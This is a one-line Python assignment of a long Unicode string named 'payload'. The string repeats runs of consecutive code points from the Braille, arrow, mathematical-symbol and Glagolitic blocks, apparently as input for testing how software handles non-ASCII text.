payload = u'⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ⡈⡉⡊⡋⡌⡍⡎⡏⡐⡑⡒⡓⡔⡕⡖⡗⡘⡙⡚⡛⡜⡝⡞⡟⡠⡡⡢⡣⡤⡥⡦⡧⡨⡩⡪⡫⡬⡭⡮⡯⡰⡱⡲⡳⡴⡵⡶⡷⡸⡹⡺⡻⡼⡽⡾⡿⢀⢁⢂⢃⢄⢅⢆⢇⢈⢉⢊⢋⢌⢍⢎⢏⢐⢑⢒⢓⢔⢕⢖⢗⢘⢙⢚⢛⢜⢝⢞⢟⢠⢡⢢⢣⢤⢥⢦⢧⢨⢩⢪⢫⢬⢭⢮⢯⢰⢱⢲⢳⢴⢵⢶⢷⢸⢹⢺⢻⢼⢽⢾⢿⣀⣁⣂⣃⣄⣅⣆⣇⣈⣉⣊⣋⣌⣍⣎⣏⣐⣑⣒⣓⣔⣕⣖⣗⣘⣙⣚⣛⣜⣝⣞⣟⣠⣡⣢⣣⣤⣥⣦⣧⣨⣩⣪⣫⣬⣭⣮⣯⣰⣱⣲⣳⣴⣵⣶⣷⣸⣹⣺⣻⣼⣽⣾⣿⤀⤁⤂⤃⤄⤅⤆⤇⤈⤉⤊⤋⤌⤍⤎⤏⤐⤑⤒⤓⤔⤕⤖⤗⤘⤙⤚⤛⤜⤝⤞⤟⤠⤡⤢⤣⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏